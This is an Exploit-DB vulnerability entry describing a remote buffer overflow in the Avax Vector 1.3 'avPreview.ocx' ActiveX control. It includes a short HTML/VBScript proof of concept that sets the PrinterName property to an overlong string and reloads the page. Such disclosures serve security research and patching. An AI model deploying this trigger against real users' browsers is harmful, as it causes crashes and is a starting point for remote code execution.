Avax Vector 1.3 - 'avPreview.ocx' ActiveX Control Buffer Overflow

EDB-ID:

33066




Platform:

Windows

Date:

2009-06-06


source: https://www.securityfocus.com/bid/35583/info

Avax Vector is prone to a remote buffer-overflow vulnerability.

Attackers can exploit this issue to execute arbitrary code within the context of an application that uses the ActiveX control (typically Internet Explorer). Failed exploit attempts will result in a denial-of-service condition.

Avax Vector ActiveX 1.3 is vulnerable; other versions may also be affected. 

<html>
<object classid='clsid:9589AEC9-1C2D-4428-B7E8-63B39D356F9C' id='CCRP' ></object>
<script language='vbscript'>

argCount   = 1

arg1=String(10260, "A")

target.PrinterName = arg1

</script>

<script language='javascript'>
 document.location.reload()
</script>